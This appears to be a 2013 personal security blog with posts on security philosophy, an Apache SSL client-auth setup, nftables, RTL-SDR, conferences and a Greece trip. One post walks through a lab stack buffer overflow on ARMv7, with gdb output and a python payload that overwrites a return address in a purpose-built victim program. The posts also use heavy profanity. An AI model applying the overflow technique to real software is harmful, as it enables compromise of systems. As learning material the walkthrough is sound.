------------------------------------------------------------------
Security is NOT:

Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..


Security is:

Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery proceedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers,
disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively
affecting the network, productivity and budget"
------------------------------------------------------------------

In past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem, which it was supposed to be solved.* Right here, there's one thing you might want to know: Firstly, some "sec box" vendor has been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute to the community. *........Personally I do believe that only old school cybersec principles can make system secure. But it need skilled people to do a lot of work in the daily cybersec process.  Well,  the mainstream marketing are still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.

What I'm trying to say are not hardware boxes are not important. But people also can do small business with trying to find cheap and effective solution. That's where open source cybersec solution fit in. There are a lot of great cybersec open source project. All you have to do is to pay someone who know
these cybersec open source code and combine them into the your own cybersec solution. For example, a customer want to hardening their network and server. There are a lot of open source sec project can do that, such as
iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web level
hardening stuff( inside the DJANGO for preventing sql injection, mod_security, etc). But the customer would pay someone who know about it to consulting for
them. The skilled guy could train customer's IT guys or go through
with their own implementation. Personally, I think it's the best to do
the cybersec small business. It's win-win solution! Old school guys get
pay and customer are happy.

btw: Some regions may have these cybersec small business model already.
--------------------------------------------------------------------------

Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much  in my daily life. But all in all, neo-calvinist is Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christian was feel so good to doing terrible things  in name of god....fuc* them....Anyway, hacker is a type of people who are willing to seek the truth with no matter cost. Even I'd see L0rd Jesus look like overmind( from starcraft) after I die. The problem to me would be "Is this true my L0rd looks like overmind?", if he is the L0rd whatever he looks like, I'd be still worship him;-)

Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.

Merry Christmas, my fellow brothers/sisters!

May L0rd's hacking spirit guide us in 2014!!!

Wednesday, November 27, 2013

How to set up apache2 with SSL/TLS support and client auth on Debian 7.2

I think SSL/TLS should be part of security hardening process. Only fools would not use cryptography technology in post-prism era. I think what Mr Snowden did, that was proved one thing: Richard Stallman and Phrack guys( I prefer use the term "philosophical anarchist") never lie to us;-) Well, I don't wanna bullshit anything about this controversial topic here...let's see how we can set up a HTTPS server with client auth.

Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)

Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5a
        Validity
            Not Before: Nov 19 02:08:14 2013 GMT
            Not After : Nov 18 02:08:14 2016 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-shit.com
        X509v3 extensions:
            X509v3 Subject Key Identifier:
                D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

            X509v3 Basic Constraints:
                CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)

Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------

Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------

Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------

Generate server CSR(Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------

Genrate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------

You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt


Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------

Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5c
        Validity
            Not Before: Nov 19 02:28:13 2013 GMT
            Not After : Nov 19 02:28:13 2014 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-info.com
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------


Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------

Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit

root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
  service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled

edit /etc/apache2/sites-enabled/default-ssl:
        SSLCertificateFile    /etc/ssl/hardened-shit/server.crt
        SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key

        SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt

        SSLCACertificatePath /etc/ssl/hardened-shit/
        SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt

        SSLVerifyClient require
        SSLVerifyDepth  10










Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------

Done....it should works.

btw: I highly recommend you to read these two articles if you want to know further: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache

I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1

Thursday, November 21, 2013

Hello, stack bufferoverflow on Debian ARMv7

I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a NAT network between host and qemu guest. Or just use my network config.

To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....

shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x00008448 <+0>:    push    {r7, lr}
   0x0000844a <+2>:    sub    sp, #8
   0x0000844c <+4>:    add    r7, sp, #0
   0x0000844e <+6>:    str    r0, [r7, #4]
   0x00008450 <+8>:    str    r1, [r7, #0]
   0x00008452 <+10>:    movw    r3, #34040    ; 0x84f8
   0x00008456 <+14>:    movt    r3, #0
   0x0000845a <+18>:    mov    r0, r3
   0x0000845c <+20>:    movw    r1, #33797    ; 0x8405
   0x00008460 <+24>:    movt    r1, #0
   0x00008464 <+28>:    movw    r2, #33845    ; 0x8435
   0x00008468 <+32>:    movt    r2, #0
   0x0000846c <+36>:    blx    0x8340
   0x00008470 <+40>:    ldr    r3, [r7, #0]
   0x00008472 <+42>:    add.w    r3, r3, #4
   0x00008476 <+46>:    ldr    r3, [r3, #0]
   0x00008478 <+48>:    mov    r0, r3
   0x0000847a <+50>:    bl    0x8404
   0x0000847e <+54>:    mov.w    r3, #0    ==> 0x0000847e should be the return address of test()
   0x00008482 <+58>:    mov    r0, r3
   0x00008484 <+60>:    add.w    r7, r7, #8
   0x00008488 <+64>:    mov    sp, r7
   0x0000848a <+66>:    pop    {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
   0x00008434 <+0>:    push    {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
   0x00008436 <+2>:    add    r7, sp, #0
   0x00008438 <+4>:    movw    r0, #34024    ; 0x84e8
   0x0000843c <+8>:    movt    r0, #0
   0x00008440 <+12>:    blx    0x8358
   0x00008444 <+16>:    pop    {r7, pc}
End of assembler dump.

Let's check the memory layout:

(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11      strcpy(buf, input);
(gdb) n
12      printf("%s \n", buf);
(gdb)
AAAABBBB
13    }
(gdb) x/12x $sp
0x7efff658:    0x00000000    0x7efff919    0x000084f8    0x41414141
0x7efff668:    0x42424242    0x00008400    0x7efff678    0x0000847f==> ret addr of test()
0x7efff678:    0x7efff7d4    0x00000002    0x00000000    0x76f12cfb

So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]

Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?

OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A' , "4\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�

Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17      printf("being hacked\n");
(gdb) n

Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.

Did you see this? +1 with the fuc_me()'s addr, plz.....

(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff90f 'A' , "5\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked

Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13    }

It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault

===========================

I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.

Wednesday, October 23, 2013

Say "hello nftables" on Debian 7 GNU/Linux

Nftables is the 4th generation packet filter engine for linux kernel and it will be merged into kernel 3.13. I haven't play with netfilter for a while. When I saw Nftables a couple of days ago, I think there's something( iteches?) I need to scratch;-) Let's try to say "Hi" to nftables.

OS: Debian 7 GNU/Linux. Grab the small version of iso here.

After the installation. Some packages are needed to be install also:
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package

Firstly, you need to compile two libraries: libmnl and libnftables
git clone git://git.netfilter.org/libmnl
cd libmnl/
./autogen.sh
./configure
make
sudo make install
sudo ldconfig

git://git.netfilter.org/libnftables
cd libnftables/
./autogen.sh
./configure --with-json-parsing --with-xml-parsing
make
sudo make install
sudo ldconfig

Then, compile/install the userspace tool( nft):

git clone git://git.netfilter.org/nftables
cd nftables
./autogen.sh
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes  ./configure
make
sudo make install
sudo ldconfig

Well, because linux-3.13 is not release yet. So we need to grab the source code from nftables dev tree:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux
cp /boot/config-3.2.0-4-686-pae .config
make menuconfig( select these NF_TABLES options)
make -j 3 deb-pkg
cd ../
sudo dpkg -i *.deb

Reboot your machine. Let's try some policies. Thanks to the author whoever wrote this HOWTO. Nftables policy is seem easy to write. But I'm still not get used to the new style since I even don't know how to delete a table. It always saying the device is BUSY or something like that. WTH~ I checked the commits, it should be a feature though. I think the policy converter tool between iptables and nftables, that is necessary. Otherwise, it'd be barries to those old school iptables users/admin/developers.

Thursday, October 17, 2013

RTL-SDR version of "Hello World"

Telco sec is always a fascinating field I want to get involve with. Why? Because those old school Phrack guys has playing both computer sec and telco sec. I missed the golden age of Phrack that was bothered me for a while. It won't stop me to dive into any field I want now. If what makes you tick is only for profit( money?), come on, you probably won't be having qualify to mention the term "underground spirit";-)

About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this website. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.

Freq counter, it probably could be detecting IR-based controller
 Catching the shit in the air( not the wire) 
Support EFF....

Saturday, September 28, 2013

Syscan Beijing 2013 slides

I've been to 5 conferences ( KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in past months. The 1st four confs were sucks. But the Syscan brought us very high quality. Don't get me wrong. Some people think these 4 conferences are good. Because they are websec guys or windows guys. As a GNU/Linux sec guy, these conferences were drugging me to sleep;-) So, I only bullshit a little bit of Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people thought Stefan many pieces technique elements in the process of exploiting and each one of them are difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation is about ROP gadgets. I don't know much about this field. I only used some open source ROP gadgets finder once or twice. Anyway, Nguyen's talk was also blowed up my mind in the 1st day of the conference. Because his apporach is combine a llvm compiler based( dude, you are using formal logic to deal with a sec shit! Fuc*ing awesome). Plz take a look at his slide. There were other great presentations. I'll leave the download slide in the end.

Another funny story is in the almost end of Jonathan's presentation. A guy who asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are grsecurity guys: They invented the concept of ASLR, and more....btw, take a look at how grsec deal with stack canary in the hardend kernel;-)

I've packed all slides into one tar.bz file.

Can you fucking imagine that the conference organizers( I wouldn't name you motherfuckers) brought these girls( sexy? I don't think so) there? I don't care about girls in a conference. As our type of guys, we'd go out to the club/bar after conference. Unfortunately, I've already get married, which means "fuck around" part is not belong to me;-)



Sunday, July 28, 2013

Trip of Thessaloniki for osc 2013

As many people mentioned, openSUSE conference 2013 was held on July 18 to July 22 in Thessaloniki, Greece. After 20hrs in the air and waiting in the airport( for transfer), I arrived in the city of Thessaloniki about 3:00 PM on July 17. Then I went to the sea side by buy No.78. It was really nice view there. Then I took a taxi to hotel for another 12 hrs sleep;-) I visited to the white tower and Aristotle square. The great Philosopher Aristotle was born in the place where near by the city of Thessaloniki. I thought Aristotle was visit the city but I haven't find the related information yet.

It was really nice to be there. Local people are so relaxing. Much relaxer than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. Some people I met in Thessaloniki, we all love beer/sec/gaming/system of a down/ramstein/Nirvana/etc....even the background music of main conference room was Nirvana songs. Man, can you believe it? I never see it happened in China. They guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned not less from them in few days.

This trip makes me feel my way back home. Most people doesn't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.

-------------------------------------------------------------------------
 - I love punk rock and metal, am I wrong?
 - I love Philosophy/Theology/History, am I fucking wrong?
 - I love Tri-A title computer/video games, am I fucking wrong?
 - I don't care how much money I earn( I can still feed my family, you piece of shit-_-), am I wrong? 
 - I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?
 ------------------------------------------------------------------------

I don't think I'm a weirdo guy. But most Chinese people I met in BJ just think that way. Don't give me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are minorities....Greenday is always supporting us: "I wanna be the minority... I don't need your authorirty...Down with moral majority"...aha, I really love this song;-)

btw: The food in the city of Thessaloniki are really awesome, especially the seafood. And, I as a newbie had a presentation "Introduction to GNU/Linux hardening" in osc 2013.

Nice view, ha?

old good port


White Tower, or maybe we should call it "The Greece Tower"



I hadn't find the ASSOS yet;-)
 Little dude, you got a gun?
 Olympic Museum, this is the place for osc2013
  Gecko money is not a bad idea, isn't it?
 Sometime, RMS is wrong. Free speech is as free beer;-)
 July 23, people are gone
 I love this shit!@#$%^&*()
 Istanbul - In the map of Civilization IV, ring the bell?
 Awesome architecture...........